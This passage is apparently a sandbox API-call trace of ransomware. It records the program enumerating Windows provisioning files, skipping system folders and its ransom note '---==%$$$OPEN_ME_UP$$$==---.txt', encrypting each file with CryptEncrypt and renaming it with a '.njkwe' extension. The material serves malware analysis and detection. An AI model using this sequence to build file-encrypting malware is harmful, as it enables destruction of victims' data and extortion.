ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90ac6903, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90ac6903, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2dd, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="287__Connections_Cellular_KPN-Hi (Netherlands)_i5$(__MVID)@WAP.provxml", cAlternateFileName="287__C~1.PRO")) returned 1 [0078.013] lstrcmpiW (lpString1="287__Connections_Cellular_KPN-Hi (Netherlands)_i5$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.013] lstrcmpiW (lpString1="287__Connections_Cellular_KPN-Hi (Netherlands)_i5$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.013] lstrcmpiW (lpString1="287__Connections_Cellular_KPN-Hi (Netherlands)_i5$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.013] lstrcmpiW (lpString1="287__Connections_Cellular_KPN-Hi (Netherlands)_i5$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.013] lstrcmpiW (lpString1="287__Connections_Cellular_KPN-Hi (Netherlands)_i5$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.013] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\287__Connections_Cellular_KPN-Hi (Netherlands)_i5$(__MVID)@WAP.provxml") returned 164 [0078.013] StrStrIW (lpFirst="287__Connections_Cellular_KPN-Hi (Netherlands)_i5$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.013] lstrcmpW (lpString1="287__Connections_Cellular_KPN-Hi (Netherlands)_i5$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.013] lstrcmpW (lpString1="287__Connections_Cellular_KPN-Hi (Netherlands)_i5$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.013] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\287__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.013] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\287__Connections_Cellular_KPN-Hi (Netherlands)_i5$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\287__connections_cellular_kpn-hi (netherlands)_i5$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.014] GetTickCount () returned 0x1153d63 [0078.014] GetTickCount () returned 0x1153d63 [0078.014] GetTickCount () returned 0x1153d63 [0078.014] GetTickCount () returned 0x1153d63 [0078.014] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.014] GetProcessHeap () returned 0xbe0000 [0078.014] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.014] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2dd, lpOverlapped=0x0) returned 1 [0078.015] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.015] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2dd, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2dd, lpOverlapped=0x0) returned 1 [0078.016] GetProcessHeap () returned 0xbe0000 [0078.016] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.016] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.016] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.016] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.016] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.016] CloseHandle (hObject=0x43c) returned 1 [0078.016] GetProcessHeap () returned 0xbe0000 [0078.016] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.016] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\287__Connections_Cellular_KPN-Hi (Netherlands)_i5$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 184 [0078.016] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\287__Connections_Cellular_KPN-Hi (Netherlands)_i5$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\287__connections_cellular_kpn-hi (netherlands)_i5$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\287__Connections_Cellular_KPN-Hi (Netherlands)_i5$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\287__connections_cellular_kpn-hi (netherlands)_i5$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.017] GetProcessHeap () returned 0xbe0000 [0078.017] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.017] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90ac6903, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90ac6903, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90ac6903, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="288__Connections_Cellular_KPN-Hi (Netherlands)_i6$(__MVID)@WAP.provxml", cAlternateFileName="288__C~1.PRO")) returned 1 [0078.017] lstrcmpiW (lpString1="288__Connections_Cellular_KPN-Hi (Netherlands)_i6$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.017] lstrcmpiW (lpString1="288__Connections_Cellular_KPN-Hi (Netherlands)_i6$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.017] lstrcmpiW (lpString1="288__Connections_Cellular_KPN-Hi (Netherlands)_i6$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.017] lstrcmpiW (lpString1="288__Connections_Cellular_KPN-Hi (Netherlands)_i6$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.017] lstrcmpiW (lpString1="288__Connections_Cellular_KPN-Hi (Netherlands)_i6$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.017] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\288__Connections_Cellular_KPN-Hi (Netherlands)_i6$(__MVID)@WAP.provxml") returned 164 [0078.017] StrStrIW (lpFirst="288__Connections_Cellular_KPN-Hi (Netherlands)_i6$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.017] lstrcmpW (lpString1="288__Connections_Cellular_KPN-Hi (Netherlands)_i6$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.017] lstrcmpW (lpString1="288__Connections_Cellular_KPN-Hi (Netherlands)_i6$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.017] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\288__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.017] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\288__Connections_Cellular_KPN-Hi (Netherlands)_i6$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\288__connections_cellular_kpn-hi (netherlands)_i6$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.017] GetTickCount () returned 0x1153d63 [0078.017] GetTickCount () returned 0x1153d63 [0078.017] GetTickCount () returned 0x1153d63 [0078.018] GetTickCount () returned 0x1153d63 [0078.018] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.018] GetProcessHeap () returned 0xbe0000 [0078.018] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.018] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d0, lpOverlapped=0x0) returned 1 [0078.019] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.019] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d0, lpOverlapped=0x0) returned 1 [0078.020] GetProcessHeap () returned 0xbe0000 [0078.020] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.020] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.020] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.020] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.020] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.020] CloseHandle (hObject=0x43c) returned 1 [0078.020] GetProcessHeap () returned 0xbe0000 [0078.020] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.020] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\288__Connections_Cellular_KPN-Hi (Netherlands)_i6$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 184 [0078.020] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\288__Connections_Cellular_KPN-Hi (Netherlands)_i6$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\288__connections_cellular_kpn-hi (netherlands)_i6$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\288__Connections_Cellular_KPN-Hi (Netherlands)_i6$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\288__connections_cellular_kpn-hi (netherlands)_i6$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.021] GetProcessHeap () returned 0xbe0000 [0078.021] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.021] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90ac6903, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90ac6903, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90ac6903, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2da, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="289__Connections_Cellular_KPN-Hi (Netherlands)_i7$(__MVID)@WAP.provxml", cAlternateFileName="289__C~1.PRO")) returned 1 [0078.021] lstrcmpiW (lpString1="289__Connections_Cellular_KPN-Hi (Netherlands)_i7$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.021] lstrcmpiW (lpString1="289__Connections_Cellular_KPN-Hi (Netherlands)_i7$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.021] lstrcmpiW (lpString1="289__Connections_Cellular_KPN-Hi (Netherlands)_i7$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.021] lstrcmpiW (lpString1="289__Connections_Cellular_KPN-Hi (Netherlands)_i7$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.021] lstrcmpiW (lpString1="289__Connections_Cellular_KPN-Hi (Netherlands)_i7$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.021] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\289__Connections_Cellular_KPN-Hi (Netherlands)_i7$(__MVID)@WAP.provxml") returned 164 [0078.021] StrStrIW (lpFirst="289__Connections_Cellular_KPN-Hi (Netherlands)_i7$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.021] lstrcmpW (lpString1="289__Connections_Cellular_KPN-Hi (Netherlands)_i7$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.021] lstrcmpW (lpString1="289__Connections_Cellular_KPN-Hi (Netherlands)_i7$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.021] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\289__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.021] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\289__Connections_Cellular_KPN-Hi (Netherlands)_i7$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\289__connections_cellular_kpn-hi (netherlands)_i7$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.021] GetTickCount () returned 0x1153d63 [0078.021] GetTickCount () returned 0x1153d63 [0078.021] GetTickCount () returned 0x1153d63 [0078.021] GetTickCount () returned 0x1153d63 [0078.022] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.022] GetProcessHeap () returned 0xbe0000 [0078.022] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.022] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2da, lpOverlapped=0x0) returned 1 [0078.024] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd26, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.024] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2da, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2da, lpOverlapped=0x0) returned 1 [0078.024] GetProcessHeap () returned 0xbe0000 [0078.024] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.024] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.024] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.024] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.024] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.025] CloseHandle (hObject=0x43c) returned 1 [0078.025] GetProcessHeap () returned 0xbe0000 [0078.025] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.025] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\289__Connections_Cellular_KPN-Hi (Netherlands)_i7$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 184 [0078.025] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\289__Connections_Cellular_KPN-Hi (Netherlands)_i7$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\289__connections_cellular_kpn-hi (netherlands)_i7$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\289__Connections_Cellular_KPN-Hi (Netherlands)_i7$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\289__connections_cellular_kpn-hi (netherlands)_i7$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.025] GetProcessHeap () returned 0xbe0000 [0078.025] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.025] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x901af563, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x901af563, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x901af563, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x288, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="28__Connections_Cellular_Hutchison - 3 (Austria)_i0$(__MVID)@WAP.provxml", cAlternateFileName="28__CO~1.PRO")) returned 1 [0078.025] lstrcmpiW (lpString1="28__Connections_Cellular_Hutchison - 3 (Austria)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.025] lstrcmpiW (lpString1="28__Connections_Cellular_Hutchison - 3 (Austria)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.026] lstrcmpiW (lpString1="28__Connections_Cellular_Hutchison - 3 (Austria)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.026] lstrcmpiW (lpString1="28__Connections_Cellular_Hutchison - 3 (Austria)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.026] lstrcmpiW (lpString1="28__Connections_Cellular_Hutchison - 3 (Austria)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.026] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\28__Connections_Cellular_Hutchison - 3 (Austria)_i0$(__MVID)@WAP.provxml") returned 166 [0078.026] StrStrIW (lpFirst="28__Connections_Cellular_Hutchison - 3 (Austria)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.026] lstrcmpW (lpString1="28__Connections_Cellular_Hutchison - 3 (Austria)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.026] lstrcmpW (lpString1="28__Connections_Cellular_Hutchison - 3 (Austria)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.026] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\28__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.026] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\28__Connections_Cellular_Hutchison - 3 (Austria)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\28__connections_cellular_hutchison - 3 (austria)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.027] GetTickCount () returned 0x1153d63 [0078.027] GetTickCount () returned 0x1153d63 [0078.027] GetTickCount () returned 0x1153d63 [0078.027] GetTickCount () returned 0x1153d63 [0078.027] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.027] GetProcessHeap () returned 0xbe0000 [0078.027] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.027] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x288, lpOverlapped=0x0) returned 1 [0078.028] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd78, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.029] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x288, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x288, lpOverlapped=0x0) returned 1 [0078.029] GetProcessHeap () returned 0xbe0000 [0078.029] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.029] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.029] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.029] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.029] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.029] CloseHandle (hObject=0x43c) returned 1 [0078.029] GetProcessHeap () returned 0xbe0000 [0078.029] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, 